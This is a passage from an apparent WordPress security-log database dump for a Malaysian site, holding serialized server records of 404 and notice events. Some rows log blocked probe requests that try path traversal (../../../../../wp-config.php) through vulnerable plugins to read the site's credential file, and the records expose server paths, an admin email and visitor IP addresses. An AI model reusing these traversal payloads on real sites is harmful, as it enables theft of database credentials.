Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/jm-ajax/upload_file/\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/jm-ajax/upload_file/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDIT128Is7SvRkXTvgiagAAAZg\";s:12:\"REDIRECT_URL\";s:21:\"/jm-ajax/upload_file/\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"51621\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/jm-ajax/upload_file/\";s:10:\"SCRIPT_URL\";s:21:\"/jm-ajax/upload_file/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDIT128Is7SvRkXTvgiagAAAZg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570818127.1495\";s:12:\"REQUEST_TIME\";s:10:\"1570818127\";}}','notice','2019-10-11 18:22:08','2019-10-11 18:22:07',35018080,36818680,'https://bintara.com.my/jm-ajax/upload_file/',1,0,'192.99.15.141'),(27921,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:132:\"/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:120:\"https://bintara.com.my/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:98:\"/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaDIiC@o9FnUGZd3w70NcAAAAFc\";s:19:\"REDIRECT_SCRIPT_URI\";s:120:\"https://bintara.com.my/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:98:\"/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDIiC@o9FnUGZd3w70NcAAAAFc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"55395\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:120:\"https://bintara.com.my/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php\";s:10:\"SCRIPT_URL\";s:98:\"/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDIiC@o9FnUGZd3w70NcAAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570818184.2963\";s:12:\"REQUEST_TIME\";s:10:\"1570818184\";}}','notice','2019-10-11 18:23:05','2019-10-11 18:23:04',35052696,36851336,'https://bintara.com.my/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php',1,0,'192.99.15.141'),(27922,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:78:\"/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:67:\"https://bintara.com.my/wp-content/plugins/ungallery/source_vuln.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:45:\"/wp-content/plugins/ungallery/source_vuln.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaDImi@o9FnUGZd3w70NcQAAAFQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:67:\"https://bintara.com.my/wp-content/plugins/ungallery/source_vuln.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:45:\"/wp-content/plugins/ungallery/source_vuln.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDImi@o9FnUGZd3w70NcQAAAFQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"57130\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:67:\"https://bintara.com.my/wp-content/plugins/ungallery/source_vuln.php\";s:10:\"SCRIPT_URL\";s:45:\"/wp-content/plugins/ungallery/source_vuln.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDImi@o9FnUGZd3w70NcQAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570818202.1791\";s:12:\"REQUEST_TIME\";s:10:\"1570818202\";}}','notice','2019-10-11 18:23:24','2019-10-11 18:23:22',35053352,36858680,'https://bintara.com.my/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php',1,0,'192.99.15.141'),(27923,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"64.90.48.191\";s:11:\"REMOTE_PORT\";s:5:\"42065\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDgaC@o9FnUGZd3w70RSAAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570824296.7813\";s:12:\"REQUEST_TIME\";s:10:\"1570824296\";}}','notice','2019-10-11 20:04:59','2019-10-11 20:04:57',35421136,37225800,'https://bintara.com.my/?page_id=18',1,0,'64.90.48.191'),(27924,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:160:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:24:\"HTTP_AMP_CACHE_TRANSFORM\";s:17:\"google;v=\\\"1..2\\\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"48027\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDhGi@o9FnUGZd3w70RcwAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570824474.7508\";s:12:\"REQUEST_TIME\";s:10:\"1570824474\";}}','notice','2019-10-11 20:07:56','2019-10-11 20:07:55',33828640,34186784,'https://bintara.com.my/?page_id=18',1,0,'66.249.71.30'),(27925,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:151:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.4793.400 QQBrowser/10.0.745.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"96.114.64.128\";s:11:\"REMOTE_PORT\";s:5:\"46263\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDmZCs5YWMzYbMc823mDAAAAcY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570825828.6878\";s:12:\"REQUEST_TIME\";s:10:\"1570825828\";}}','notice','2019-10-11 20:30:31','2019-10-11 20:30:29',35460688,37265592,'https://bintara.com.my/?page_id=18',1,0,'96.114.64.128'),(27926,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/B08C390C\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"64.90.48.191\";s:11:\"REMOTE_PORT\";s:5:\"37323\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDoeuBk7nWdSYNcyx-RoQAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570826362.8746\";s:12:\"REQUEST_TIME\";s:10:\"1570826362\";}}','notice','2019-10-11 20:39:25','2019-10-11 20:39:23',35029448,36833552,'https://bintara.com.my/?page_id=18/contact.php',1,0,'64.90.48.191'),(27927,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"96.114.64.128\";s:11:\"REMOTE_PORT\";s:5:\"53939\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDwpis5YWMzYbMc823p4gAAAcU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570828454.1247\";s:12:\"REQUEST_TIME\";s:10:\"1570828454\";}}','notice','2019-10-11 21:14:16','2019-10-11 21:14:14',35420152,37229128,'https://bintara.com.my/?page_id=18',1,0,'96.114.64.128'),(27928,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4482.400 QQBrowser/9.7.13001.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"64.90.48.210\";s:11:\"REMOTE_PORT\";s:5:\"56951\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaEs4F28Is7SvRkXTvguKQAAAZc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570843872.7081\";s:12:\"REQUEST_TIME\";s:10:\"1570843872\";}}','notice','2019-10-12 01:31:16','2019-10-12 01:31:13',35431360,37230992,'https://bintara.com.my/?page_id=18',1,0,'64.90.48.210'),(27929,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 